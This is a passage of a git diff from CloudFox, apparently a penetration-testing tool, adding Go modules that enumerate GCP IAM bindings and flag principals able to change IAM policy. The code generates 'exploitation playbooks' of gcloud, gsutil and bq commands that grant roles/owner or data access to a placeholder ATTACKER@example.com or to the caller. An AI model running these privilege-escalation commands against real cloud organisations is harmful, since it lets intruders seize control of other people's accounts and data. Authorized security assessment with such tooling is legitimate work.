--member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "resourcemanager.folders.setIamPolicy": + return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "resourcemanager.projects.setIamPolicy": + 
return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "iam.roles.create": + return fmt.Sprintf("gcloud iam roles create customAdmin --project=%s --permissions=resourcemanager.projects.setIamPolicy", scopeID) + case "iam.roles.update": + return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=resourcemanager.projects.setIamPolicy", scopeID) + case "iam.serviceAccounts.setIamPolicy": + return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding SA@%s.iam.gserviceaccount.com --member='user:ATTACKER@example.com' --role='roles/iam.serviceAccountTokenCreator'", scopeID) + case "orgpolicy.policy.set": + return "# Disable org policy constraints to bypass security controls" + case "storage.buckets.setIamPolicy": + return "gsutil iam ch user:ATTACKER@example.com:objectViewer gs://BUCKET_NAME" + case "bigquery.datasets.setIamPolicy": + return fmt.Sprintf("bq add-iam-policy-binding --member='user:ATTACKER@example.com' --role='roles/bigquery.dataViewer' %s:DATASET", scopeID) + default: + return fmt.Sprintf("# %s - refer to GCP documentation", permission) + } +} + +func (m *HiddenAdminsModule) getIAMService(ctx context.Context) (*iam.Service, error) { + return iam.NewService(ctx) +} + +func (m *HiddenAdminsModule) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + return m.getKnownRolePermissions(role) + } + + return 
roleInfo.IncludedPermissions +} + +func (m *HiddenAdminsModule) getKnownRolePermissions(role string) []string { + knownRoles := map[string][]string{ + "roles/owner": { + "resourcemanager.projects.setIamPolicy", + "iam.serviceAccounts.setIamPolicy", + "iam.roles.create", + "iam.roles.update", + "storage.buckets.setIamPolicy", + "bigquery.datasets.setIamPolicy", + }, + "roles/resourcemanager.organizationAdmin": { + "resourcemanager.organizations.setIamPolicy", + }, + "roles/resourcemanager.folderAdmin": { + "resourcemanager.folders.setIamPolicy", + }, + "roles/resourcemanager.projectIamAdmin": { + "resourcemanager.projects.setIamPolicy", + }, + "roles/iam.securityAdmin": { + "resourcemanager.projects.setIamPolicy", + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.serviceAccountAdmin": { + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.roleAdmin": { + "iam.roles.create", + "iam.roles.update", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + return []string{} +} + +func (m *HiddenAdminsModule) generateLoot() { + // Loot is now generated per-project in writeHierarchicalOutput/writeFlatOutput +} + +func (m *HiddenAdminsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *HiddenAdminsModule) getHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Principal", + "Principal Type", + "Permission", + "Category", + } +} + +func (m *HiddenAdminsModule) adminsToTableBody(admins []HiddenAdmin) [][]string { + var body [][]string + for _, admin := range admins { + scopeName := admin.ScopeName + if scopeName == "" { + scopeName = admin.ScopeID + } + + body = append(body, []string{ + admin.ScopeType, + admin.ScopeID, + scopeName, + admin.Principal, + admin.PrincipalType, + admin.Permission, + admin.Category, + }) + } + return body +} + +// 
adminsForProject returns hidden admins filtered for a specific project +// Includes: +// - Project-scoped findings where ScopeID matches this project +// - Org-scoped findings where the org is this project's org +// - Folder-scoped findings where the folder is in this project's ancestry path +// For all of the above, the principal must either be from this project (SA) or be a user/group +func (m *HiddenAdminsModule) adminsForProject(projectID string) []HiddenAdmin { + var filtered []HiddenAdmin + + // Get ancestry data for this project + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } + + for _, admin := range m.AllAdmins { + // Check if principal is relevant for this project + principalProject := extractProjectFromPrincipal(admin.Principal, m.OrgCache) + principalRelevant := principalProject == projectID || principalProject == "" + + if !principalRelevant { + continue + } + + switch admin.ScopeType { + case "project": + // Project-scoped: must match this project + if admin.ScopeID == projectID { + filtered = append(filtered, admin) + } + case "organization": + // Org-scoped: must be this project's org + if projectOrgID != "" && admin.ScopeID == projectOrgID { + filtered = append(filtered, admin) + } else if projectOrgID == "" { + // No org info, include all org findings for users/groups + filtered = append(filtered, admin) + } + case "folder": + // Folder-scoped: must be in this project's ancestry + if len(ancestorFolderSet) > 0 { + if ancestorFolderSet[admin.ScopeID] { + filtered = append(filtered, admin) + } + } else { + // No ancestry info, include all folder findings for users/groups + 
filtered = append(filtered, admin) + } + default: + // Resource-level: include if principal is relevant + filtered = append(filtered, admin) + } + } + + return filtered +} + +// adminsToTableBodyForProject returns table body filtered for a specific project +func (m *HiddenAdminsModule) adminsToTableBodyForProject(projectID string) [][]string { + admins := m.adminsForProject(projectID) + return m.adminsToTableBody(admins) +} + +// wrongAdminsForProject returns wrong admins filtered for a specific project +// Includes: +// - Project-level wrong admins where ProjectID matches this project +// - Org-level wrong admins where OrgID matches this project's org +// - Folder-level wrong admins where FolderID is in this project's ancestry +// For all of the above, the principal must either be from this project (SA) or be a user/group +func (m *HiddenAdminsModule) wrongAdminsForProject(projectID string) []foxmapperservice.WrongAdminFinding { + var filtered []foxmapperservice.WrongAdminFinding + + // Get ancestry data for this project + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } + + for _, wa := range m.WrongAdmins { + principalProject := extractProjectFromPrincipal(wa.Principal, m.OrgCache) + principalRelevant := principalProject == projectID || principalProject == "" + + if !principalRelevant { + continue + } + + switch wa.AdminLevel { + case "project": + // Project-level: include if ProjectID matches this project + if wa.ProjectID == projectID { + filtered = append(filtered, wa) + } + case "org": + // Org-level: must be this project's org + if projectOrgID != "" && wa.OrgID == projectOrgID { + 
filtered = append(filtered, wa) + } else if projectOrgID == "" { + // No org info available, include all org findings for relevant principals + filtered = append(filtered, wa) + } + case "folder": + // Folder-level: must be in this project's ancestry + if len(ancestorFolderSet) > 0 && wa.FolderID != "" { + if ancestorFolderSet[wa.FolderID] { + filtered = append(filtered, wa) + } + } else if len(ancestorFolderSet) == 0 { + // No ancestry info available, include all folder findings for relevant principals + filtered = append(filtered, wa) + } + default: + // Unknown level, include for relevant principals if ProjectID matches + if wa.ProjectID == projectID || wa.ProjectID == "" { + filtered = append(filtered, wa) + } + } + } + + return filtered +} + +// wrongAdminsToTableBodyForProject returns wrong admins table body for a project +func (m *HiddenAdminsModule) wrongAdminsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, wa := range m.wrongAdminsForProject(projectID) { + reasonsStr := strings.Join(wa.Reasons, "; ") + + displayProject := wa.ProjectID + if displayProject == "" { + displayProject = "-" + } + + body = append(body, []string{ + wa.Principal, + wa.MemberType, + wa.AdminLevel, + displayProject, + reasonsStr, + }) + } + return body +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *HiddenAdminsModule) generatePlaybookForProject(projectID string) *internal.LootFile { + admins := m.adminsForProject(projectID) + wrongAdmins := m.wrongAdminsForProject(projectID) + + if len(admins) == 0 && len(wrongAdmins) == 0 { + return nil + } + + var sb strings.Builder + sb.WriteString("# GCP Hidden Admins Exploitation Playbook\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") + + // Add wrong admins section if available + if len(wrongAdmins) > 0 { + sb.WriteString("# === WRONG 
ADMINS (FOXMAPPER ANALYSIS) ===\n\n") + sb.WriteString("# These principals are marked as admin but don't have explicit admin roles.\n\n") + + for _, wa := range wrongAdmins { + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s [%s]\n"+ + "# =============================================================================\n", wa.Principal, wa.MemberType)) + sb.WriteString(fmt.Sprintf("Admin Level: %s\n", wa.AdminLevel)) + for _, reason := range wa.Reasons { + sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + } + + // Add exploit command based on admin level + switch wa.AdminLevel { + case "org": + sb.WriteString("\n# Grant yourself org-level owner:\n") + orgID := wa.OrgID + if orgID == "" { + orgID = "ORG_ID" + } + sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", orgID, wa.MemberType, wa.Principal)) + case "folder": + sb.WriteString("\n# Grant yourself folder-level owner:\n") + folderID := wa.FolderID + if folderID == "" { + folderID = "FOLDER_ID" + } + sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", folderID, wa.MemberType, wa.Principal)) + default: + sb.WriteString("\n# Grant yourself project-level owner:\n") + targetProject := wa.ProjectID + if targetProject == "" { + targetProject = projectID + } + sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", targetProject, wa.MemberType, wa.Principal)) + } + } + } + + // Add hidden admins section + if len(admins) > 0 { + sb.WriteString("# === HIDDEN ADMINS (IAM MODIFICATION CAPABILITIES) ===\n\n") + + for _, admin := range admins { + scopeInfo := fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeName) + if admin.ScopeName == "" { + scopeInfo = fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeID) + } + + sb.WriteString(fmt.Sprintf("# 
=============================================================================\n"+ + "# %s [%s]\n"+ + "# =============================================================================\n", admin.Principal, admin.PrincipalType)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", admin.Permission)) + sb.WriteString(fmt.Sprintf("Category: %s\n", admin.Category)) + sb.WriteString(fmt.Sprintf("Scope: %s\n", scopeInfo)) + sb.WriteString("\n") + sb.WriteString(admin.ExploitCommand) + sb.WriteString("\n\n") + } + } + + return &internal.LootFile{ + Name: "hidden-admins-commands", + Contents: sb.String(), + } +} + +func (m *HiddenAdminsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + // Hidden admins table + body := m.adminsToTableBodyForProject(projectID) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "hidden-admins", + Header: m.getHeader(), + Body: body, + }) + } + + // Wrong admins table + wrongBody := m.wrongAdminsToTableBodyForProject(projectID) + if len(wrongBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "wrong-admins", + Header: m.getWrongAdminsHeader(), + Body: wrongBody, + }) + } + + return tableFiles +} + +func (m *HiddenAdminsModule) buildAllTables() []internal.TableFile { + var tables []internal.TableFile + + if len(m.AllAdmins) > 0 { + tables = append(tables, internal.TableFile{ + Name: "hidden-admins", + Header: m.getHeader(), + Body: m.adminsToTableBody(m.AllAdmins), + }) + } + + // Add wrong admins table if FoxMapper data is available + if len(m.WrongAdmins) > 0 { + tables = append(tables, internal.TableFile{ + Name: "wrong-admins", + Header: m.getWrongAdminsHeader(), + Body: m.wrongAdminsToTableBody(), + }) + } + + return tables +} + +func (m *HiddenAdminsModule) getWrongAdminsHeader() []string { + return []string{ + "Principal", + "Type", + "Admin Level", + "Project", + "Reasons", + } +} + +func (m *HiddenAdminsModule) 
wrongAdminsToTableBody() [][]string { + var body [][]string + for _, wa := range m.WrongAdmins { + // Combine reasons into a single string + reasonsStr := strings.Join(wa.Reasons, "; ") + + projectID := wa.ProjectID + if projectID == "" { + projectID = "-" + } + + body = append(body, []string{ + wa.Principal, + wa.MemberType, + wa.AdminLevel, + projectID, + reasonsStr, + }) + } + return body +} + + +func (m *HiddenAdminsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project + for _, projectID := range m.ProjectIDs { + // Build tables for this project + tableFiles := m.buildTablesForProject(projectID) + + // Generate loot file for this project + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + lootFiles = append(lootFiles, *playbook) + } + + // Add project to output if there's any data + if len(tableFiles) > 0 || len(lootFiles) > 0 { + outputData.ProjectLevelData[projectID] = HiddenAdminsOutput{Table: tableFiles, Loot: lootFiles} + } + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } +} + +func (m *HiddenAdminsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildAllTables() + + // Generate per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + // Rename to include project for flat output + playbook.Name = 
fmt.Sprintf("hidden-admins-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := HiddenAdminsOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } +} + +// Helper functions (shared with attackpathService) +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +func extractPrincipalEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go old mode 100644 new mode 100755 index 4c8b3139..fc168948 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -1,122 +1,1335 @@ package commands import ( + "context" "fmt" + "strings" + "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPIAMCommand = &cobra.Command{ Use: globals.GCP_IAM_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP IAM information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display IAM principals and their roles information within GCP resources: -cloudfox gcp iam`, + Aliases: []string{"roles"}, + Short: "Enumerate GCP IAM principals 
across organizations, folders, and projects", + Long: `Enumerate GCP IAM principals and their role bindings across the entire hierarchy. + +Features: +- Enumerates IAM bindings at organization, folder, and project levels +- Shows role assignments per principal with scope information +- Enumerates service accounts with key information +- Lists custom roles with their permissions +- Identifies groups and their role assignments +- Detects high-privilege roles and public access +- Shows conditional IAM policies with details +- Attempts to retrieve MFA status for users (requires Admin SDK) +- Generates gcloud commands for privilege escalation testing`, Run: runGCPIAMCommand, } -// Results struct for IAM command that implements the internal.OutputInterface -type GCPIAMResults struct { - Data []IAMService.PrincipalWithRoles +// High-privilege roles that should be flagged +var highPrivilegeRoles = map[string]bool{ + // Owner/Editor + "roles/owner": true, + "roles/editor": true, + // IAM Admin roles + "roles/iam.securityAdmin": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountUser": true, + "roles/iam.workloadIdentityUser": true, + "roles/iam.roleAdmin": true, + // Resource Manager roles + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.folderIamAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + // Compute roles + "roles/compute.admin": true, + "roles/compute.instanceAdmin": true, + "roles/compute.osAdminLogin": true, + // Storage roles + "roles/storage.admin": true, + // Functions/Run roles + "roles/cloudfunctions.admin": true, + "roles/cloudfunctions.developer": true, + "roles/run.admin": true, + "roles/run.developer": true, + // Secret Manager + "roles/secretmanager.admin": true, + // Container/Kubernetes + "roles/container.admin": true, + "roles/container.clusterAdmin": 
true, + // BigQuery + "roles/bigquery.admin": true, + // Deployment Manager + "roles/deploymentmanager.editor": true, + // Cloud Build + "roles/cloudbuild.builds.editor": true, + // Service Usage + "roles/serviceusage.serviceUsageAdmin": true, + // Org Policy + "roles/orgpolicy.policyAdmin": true, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type IAMModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - using enhanced data + ScopeBindings []IAMService.ScopeBinding + ServiceAccounts []IAMService.ServiceAccountInfo + CustomRoles []IAMService.CustomRole + Groups []IAMService.GroupInfo + MFAStatus map[string]*IAMService.MFAStatus + + // Per-scope loot for inheritance-aware output + OrgLoot map[string]*internal.LootFile // orgID -> loot commands + FolderLoot map[string]*internal.LootFile // folderID -> loot commands + ProjectLoot map[string]*internal.LootFile // projectID -> loot commands + + FoxMapperCache *gcpinternal.FoxMapperCache + OrgCache *gcpinternal.OrgCache + mu sync.Mutex + + // Member to groups mapping (email -> list of group emails) + MemberToGroups map[string][]string + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type IAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIAMCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAM_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module 
instance + module := &IAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ScopeBindings: []IAMService.ScopeBinding{}, + ServiceAccounts: []IAMService.ServiceAccountInfo{}, + CustomRoles: []IAMService.CustomRole{}, + Groups: []IAMService.GroupInfo{}, + MFAStatus: make(map[string]*IAMService.MFAStatus), + OrgLoot: make(map[string]*internal.LootFile), + FolderLoot: make(map[string]*internal.LootFile), + ProjectLoot: make(map[string]*internal.LootFile), + MemberToGroups: make(map[string][]string), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_IAM_MODULE_NAME) + } + + // Get OrgCache for hierarchy lookups + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) + + // Use the enhanced IAM enumeration + iamService := IAMService.New() + iamData, err := iamService.CombinedIAMEnhanced(ctx, m.ProjectIDs, m.ProjectNames) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Failed to enumerate IAM") + return + } + + m.ScopeBindings = iamData.ScopeBindings + m.ServiceAccounts = iamData.ServiceAccounts + m.CustomRoles = iamData.CustomRoles + m.Groups = iamData.Groups + m.MFAStatus = iamData.MFAStatus + + // Try to enumerate group memberships to build reverse lookup + enrichedGroups := iamService.GetGroupMemberships(ctx, 
m.Groups) + m.Groups = enrichedGroups + + // Build member-to-groups reverse mapping + for _, group := range enrichedGroups { + if group.MembershipEnumerated { + for _, member := range group.Members { + if member.Email != "" { + m.MemberToGroups[member.Email] = append(m.MemberToGroups[member.Email], group.Email) + } + } + } + } + + // Generate loot + m.generateLoot() + + // Count scopes and track org IDs + orgCount, folderCount, projectCount := 0, 0, 0 + scopeSeen := make(map[string]bool) + for _, sb := range m.ScopeBindings { + key := sb.ScopeType + ":" + sb.ScopeID + if !scopeSeen[key] { + scopeSeen[key] = true + switch sb.ScopeType { + case "organization": + orgCount++ + m.OrgIDs = append(m.OrgIDs, sb.ScopeID) + m.OrgNames[sb.ScopeID] = sb.ScopeName + case "folder": + folderCount++ + case "project": + projectCount++ + } + } + } + + logger.SuccessM(fmt.Sprintf("Found %d binding(s) across %d org(s), %d folder(s), %d project(s); %d SA(s), %d custom role(s), %d group(s)", + len(m.ScopeBindings), orgCount, folderCount, projectCount, + len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IAMModule) initializeLootFiles() { + // Per-scope loot is initialized lazily in addToScopeLoot +} + +func (m *IAMModule) generateLoot() { + // Track unique service accounts we've seen per scope + sasSeen := make(map[string]bool) + + for _, sb := range m.ScopeBindings { + if sb.MemberType != "ServiceAccount" { + continue + } + + // Create a unique key combining SA email and scope + scopeKey := fmt.Sprintf("%s:%s:%s", sb.ScopeType, sb.ScopeID, sb.MemberEmail) + if sasSeen[scopeKey] { + continue + } + sasSeen[scopeKey] = true + + // Check for high privilege roles + isHighPriv := highPrivilegeRoles[sb.Role] + + var lootContent string + if isHighPriv { + lootContent = fmt.Sprintf( + "# Service 
Account: %s [HIGH PRIVILEGE] (%s)\n"+ + "# See serviceaccounts-commands loot for describe/keys/impersonation commands\n\n", + sb.MemberEmail, sb.Role, + ) + } else { + continue // Skip non-high-privilege SAs — covered by serviceaccounts-commands loot + } + + // Route loot to appropriate scope + m.addToScopeLoot(sb.ScopeType, sb.ScopeID, "iam-commands", lootContent) + } + + // Add custom roles (project-level) + for _, role := range m.CustomRoles { + lootContent := fmt.Sprintf( + "# Custom Role: %s (%d permissions)\n"+ + "gcloud iam roles describe %s --project=%s\n\n", + role.Title, role.PermissionCount, + extractRoleName(role.Name), role.ProjectID, + ) + m.addToScopeLoot("project", role.ProjectID, "iam-commands", lootContent) + } + + // Generate IAM enumeration commands + m.generateEnumerationLoot() +} + +// addToScopeLoot adds loot content to the appropriate scope-level loot file +func (m *IAMModule) addToScopeLoot(scopeType, scopeID, lootName, content string) { + m.mu.Lock() + defer m.mu.Unlock() + + var lootMap map[string]*internal.LootFile + switch scopeType { + case "organization": + lootMap = m.OrgLoot + case "folder": + lootMap = m.FolderLoot + case "project": + lootMap = m.ProjectLoot + default: + return + } + + key := scopeID + ":" + lootName + if lootMap[key] == nil { + lootMap[key] = &internal.LootFile{ + Name: lootName, + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: serviceaccounts-commands for SA-specific describe/keys/impersonation commands\n\n", + } + } + lootMap[key].Contents += content +} + +func (m *IAMModule) generateEnumerationLoot() { + // Add organization-level enumeration commands + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + var lootContent string + lootContent += fmt.Sprintf("# =============================================================================\n") + lootContent += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + lootContent += 
fmt.Sprintf("# =============================================================================\n\n") + + lootContent += fmt.Sprintf("# List all IAM bindings for organization\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + + lootContent += fmt.Sprintf("# List all roles assigned at organization level\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", orgID) + + lootContent += fmt.Sprintf("# List all members with their roles at organization level\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", orgID) + + m.addToScopeLoot("organization", orgID, "iam-enumeration", lootContent) + } + + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + var lootContent string + lootContent += fmt.Sprintf("# =============================================================================\n") + lootContent += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + lootContent += fmt.Sprintf("# =============================================================================\n\n") + + lootContent += fmt.Sprintf("# List all IAM bindings for project\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) + + lootContent += fmt.Sprintf("# List all roles assigned at project level\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", projectID) + + lootContent += fmt.Sprintf("# List all members with their roles at project level\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", projectID) + + lootContent += fmt.Sprintf("# Find all roles for a specific user (replace USER_EMAIL)\n") + 
lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"USER_EMAIL\")) | .role'\n\n", projectID) + + lootContent += fmt.Sprintf("# Find all roles for a specific service account (replace SA_EMAIL)\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"SA_EMAIL\")) | .role'\n\n", projectID) + + lootContent += fmt.Sprintf("# List all service accounts in project\n") + lootContent += fmt.Sprintf("gcloud iam service-accounts list --project=%s --format=json\n\n", projectID) + + lootContent += fmt.Sprintf("# List all custom roles in project\n") + lootContent += fmt.Sprintf("gcloud iam roles list --project=%s --format=json\n\n", projectID) + + m.addToScopeLoot("project", projectID, "iam-enumeration", lootContent) + } + + // Track unique identities for enumeration commands - add to project level + identitiesSeen := make(map[string]bool) + type identityInfo struct { + email string + memberType string + roles []string + scopes []string + } + identities := make(map[string]*identityInfo) + + // Collect all unique identities and their roles/scopes + for _, sb := range m.ScopeBindings { + if sb.MemberEmail == "" { + continue + } + key := sb.MemberEmail + if !identitiesSeen[key] { + identitiesSeen[key] = true + identities[key] = &identityInfo{ + email: sb.MemberEmail, + memberType: sb.MemberType, + roles: []string{}, + scopes: []string{}, + } + } + identities[key].roles = append(identities[key].roles, sb.Role) + scopeKey := fmt.Sprintf("%s:%s", sb.ScopeType, sb.ScopeID) + // Check if scope already exists + found := false + for _, s := range identities[key].scopes { + if s == scopeKey { + found = true + break + } + } + if !found { + identities[key].scopes = append(identities[key].scopes, scopeKey) + } + } + + // Add identity-specific enumeration commands per project + for _, projectID := range m.ProjectIDs { + var lootContent 
string + lootContent += fmt.Sprintf("# =============================================================================\n") + lootContent += fmt.Sprintf("# Identity-Specific Enumeration Commands\n") + lootContent += fmt.Sprintf("# =============================================================================\n\n") + + for email, info := range identities { + if info.memberType == "ServiceAccount" { + lootContent += fmt.Sprintf("# Service Account: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this service account\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } else if info.memberType == "User" { + lootContent += fmt.Sprintf("# User: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this user\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } else if info.memberType == "Group" { + lootContent += fmt.Sprintf("# Group: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this group\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } + } + + m.addToScopeLoot("project", projectID, "iam-enumeration", lootContent) + } +} + +// extractRoleName extracts the role name from full path +func extractRoleName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName } -// TableFiles formats the data for table output, CSV & JSON files -func (g GCPIAMResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// FederatedIdentityInfo contains parsed information about a federated identity +type FederatedIdentityInfo struct { + IsFederated bool + ProviderType 
